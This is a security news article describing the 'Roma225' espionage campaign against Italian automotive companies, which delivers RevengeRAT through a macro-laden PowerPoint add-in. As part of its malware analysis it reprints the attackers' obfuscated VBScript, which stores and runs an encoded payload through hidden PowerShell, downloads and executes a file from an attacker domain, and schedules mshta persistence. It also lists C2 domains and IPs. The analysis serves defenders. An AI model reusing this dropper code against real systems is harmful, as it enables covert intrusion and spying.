• Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
MUST READ

Taking over millions of developers exploiting an Open VSX Registry flaw

 | 

OneClik APT campaign targets energy sector with stealthy backdoors

 | 

APT42 impersonates cyber professionals to phish Israeli academics and journalists

 | 

Kai West, aka IntelBroker, indicted for cyberattacks causing $25M in damages

 | 

Cisco fixed critical ISE flaws allowing Root-level remote code execution

 | 

U.S. CISA adds AMI MegaRAC SPx, D-Link DIR-859 routers, and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog

 | 

CitrixBleed 2: The nightmare that echoes the 'CitrixBleed' flaw in Citrix NetScaler devices

 | 

Hackers deploy fake SonicWall VPN App to steal corporate credentials

 | 

Mainline Health Systems data breach impacted over 100,000 individuals

 | 

Disrupting the operations of cryptocurrency mining botnets

 | 

Prometei botnet activity has surged since March 2025

 | 

The U.S. House banned WhatsApp on government devices due to security concerns

 | 

Russia-linked APT28 use Signal chats to target Ukraine official with malware

 | 

China-linked APT Salt Typhoon targets Canadian Telecom companies

 | 

U.S. warns of incoming cyber threats following Iran airstrikes

 | 

McLaren Health Care data breach impacted over 743,000 people

 | 

American steel giant Nucor confirms data breach in May attack

 | 

The financial impact of Marks & Spencer and Co-op cyberattacks could reach £440M

 | 

Iran-Linked Threat Actors Cyber Fattah Leak Visitors and Athletes' Data from Saudi Games

 | 

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 50

 | 
  • Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
  • Home
  • Breaking News
  • Hacking
  • Malware
  • ‘Roma225’ campaign targets companies in the Italian automotive sector

‘Roma225’ campaign targets companies in the Italian automotive sector

Pierluigi Paganini December 31, 2018

‘Roma225’ campaign -The Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the Italian automotive sector.

The malware was spread through well-written phishing email trying to impersonate a senior partner of one of the major Brazilian business law firms: “Veirano Advogados”.

The malicious email intercepted during the CSDC operations contains a PowerPoint add-in document (“.ppa” extension),  armed with auto-open VBA macro code.

Figure 1. Popup displayed at the .ppa file opening

Technical analysis

The macro code in the .ppa file contains a simple instruction invoking the “mshta.exe” tool to download and execute the next-stage of the dropper retrieved from “hxxps://minhacasaminhavidacdt.blogspot[.com/”.

Figure 2. Macro extracted from .ppa document

The Blogspot hosted web page downloaded by mshta.exe appears innocent-looking  to a quick skim through: opening it into the browser shows a perfectly rendered work-in progress blog page.

Figure 3. Home page of the Blogger drop url

But a deeper inspection of its source code reveals an interesting snippet inserted into an invisible blog post: this ghost article contains VBScript code.

Figure 4. Visual Basic Script hidden behind the web page

It’s funny to see the malware author tried to attribute the paternity of the script to “Microsoft Corp.”, adding pieces of comments belonging to legit Microsoft utilities:

‘Update———————————————————————————————
‘ Copyright: Microsoft Corp.
‘
‘ This script is designed to be used only for scheduled tasks(s).
‘ There is no extensive error check, and will not dump the output from the Powershell CmdLet.
‘
‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}

These comments are in fact part of the “SyncAppvPublishingServer” utility, commonly deployed into Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. Anyway, the remaining part of the script is responsible to execute a series of malicious actions:

  • Store a base64 encoded version of the “RevengeRAT” payload into registry key located at “HKCU\AppEvents\Values”
CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ"
  • Decode and execute of the stored payload
Set A0102030405 = CreateObject("WScript.Shell")
Dim CDT0908087CDT
CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:\AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);" 
A0102030405.run CDT0908087CDT, vbHide
  • Create and execute another VBScript into  “%AppData%\Local\Temp\Z3j.vbs”, capable to download a new payload from the remote destination “hxxp://cdtmaster.com[.]br”
Set XbonXo = CreateObject("WScript.Shell")
Dim XoowA83AC
XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[S\b<SfS"")>>Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[Z@<f[ZVbb^""))>>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP<ab`SO[""))>>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs  &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"
XbonXo.Run XoowA83AC, vbHide
  • Finally, the creation of a new task running again the “mshta.exe” utiliy with the “hxxps://pocasideiascdt.blogspot[.]com/” parameter every two hours. This URL points to web page which actually is a mirror of the “https://minhacasaminhavidacdt.blogspot[.]com/” one.
Dim OUGo57658586GFFJHG
Set OUGo57658586GFFJHG = CreateObject("WScript.Shell")
asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "
OUGo57658586GFFJHG.Run asdmmmc, vbHide
self.close
Figure 5. Scheduled task for persistency

Summing up, the last stages of the infection chain are designed to install a RevengeRAT variant hidden into a regkey and run the “outlook.exe” executable extracted by the “Document.exe” binary, retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”.

The following image briefly shows the malware infection chain:

Figure 6. Roma255 infection chain

RevengeRAT Payload

Once executed, the RAT immediately contacts its command and control servers sending victim machine’s information. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net“.

Figure 7. Configuration of the RevengeRAT

If one of these is down, the malware falls back to the other one. At time of writing, both the remote C2 were down, so it was only possible to emulate the server behavior in order to analyze the information sent by the RAT.

Anyway, the malware establishes a TCP connection with the server and sends to it the following stream:

Figure 8. RevengeRAT check-in data

At first sight, it’s possible to spot a repeated sequence of chars used as separator between the data fields:

roma225

This string have been chosen by the attacker during the preparation of the malware, using the customization functionalities provided by the RevengeRAT builder. Splitting and decoding the data stream, information becomes clearer:

Figure 9. decoded check-in data

As told before, the C2s were unresponsive at time of writing, however their latest IP resolution indicates the infrastructure of the attacker could be located in different countries.

For instance, the domain “office365update[.]duckdns.org” resolved to the 184.75.209.169 IP addresss, geolocated in Canada.

Moreover,  “systen32.ddns[.]net” resolved to the 138.36.3.228 IP, geolocated in Brazil.

Document.exe

The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is actually downloaded into the victim machine by the “Z3j.vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as program icon and its unique purpose is to deploy and run the “Outlook.exe” payload.

Extracting static PE information from this last sample, reveals references to the “SendBlaster” application, a program used to deliver newsletters. Here, another interesting fact comes up: this product is currently developed by the Italian firm eDisplay Srl, so, in addition to the “roma225” separator, represents another direct reference to the Italian landscape.

Figure 10. Outlook.exe static information 

When the “Outlook.exe” payload is executed, it remains apparently quiet: no outgoing network traffic or file system modifications; however it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356“.  

Cybaze-Yoroi ZLab researchers are still dissecting the Outlook.exe sample to extract its real behavior.

Conclusions

After this first analysis, it’s difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as The Gorgon Group, the enigmatic threat actor tracked by the Unit42 researchers, author of cyber espionage campaigns against UK, Spain, Russia and US governmental organization. However, the source code of the RAT has been publicly leaked few years ago and could be actually part of a multitude of cyber arsenals, more or less sophisticated. 

Anyway, there are TTP in common with Unit42 report, such as the usage of shared infrastructure (in the specific case the Blogger service) as drop-server and other popular RAT as final backdoor (i.e. njRAT).  

In fact, the “cdtmaster.com.]br” hosts other suspicious files such as the “nj.mp3” binary, which actually is a njRAT variant. All the other files are still under investigation.

Figure 11. Malware hosted on ctdmaster.com[.br

Technical details about the Roma225 compaign, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published on the Yoroi blog.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – Roma225, cyberespionage)

[adrotate banner=”5″] [adrotate banner=”13″]


facebook linkedin twitter

Cyberespionage Hacking malware Pierluigi Paganini Roma225 Security Affairs

you might also like

Pierluigi Paganini June 27, 2025
Taking over millions of developers exploiting an Open VSX Registry flaw
Read more
Pierluigi Paganini June 27, 2025
OneClik APT campaign targets energy sector with stealthy backdoors
Read more

leave a comment

newsletter

Subscribe to my email list and stay
up-to-date!

    recent articles

    Taking over millions of developers exploiting an Open VSX Registry flaw

    Hacking / June 27, 2025

    OneClik APT campaign targets energy sector with stealthy backdoors

    Hacking / June 27, 2025

    APT42 impersonates cyber professionals to phish Israeli academics and journalists

    APT / June 27, 2025

    Kai West, aka IntelBroker, indicted for cyberattacks causing $25M in damages

    Cyber Crime / June 26, 2025

    Cisco fixed critical ISE flaws allowing Root-level remote code execution

    Security / June 26, 2025

    To contact me write an email to:

    Pierluigi Paganini :
    pierluigi.paganini@securityaffairs.co

    LEARN MORE

    QUICK LINKS

    • Home
    • Cyber Crime
    • Cyber warfare
    • APT
    • Data Breach
    • Deep Web
    • Digital ID
    • Hacking
    • Hacktivism
    • Intelligence
    • Internet of Things
    • Laws and regulations
    • Malware
    • Mobile
    • Reports
    • Security
    • Social Networks
    • Terrorism
    • ICS-SCADA
    • POLICIES
    • Contact me

    Copyright@securityaffairs 2024

    We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.
    Cookie SettingsAccept All
    Manage consent

    Privacy Overview

    This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities...
    Necessary
    Always Enabled
    Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
    Non-necessary
    Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
    SAVE & ACCEPT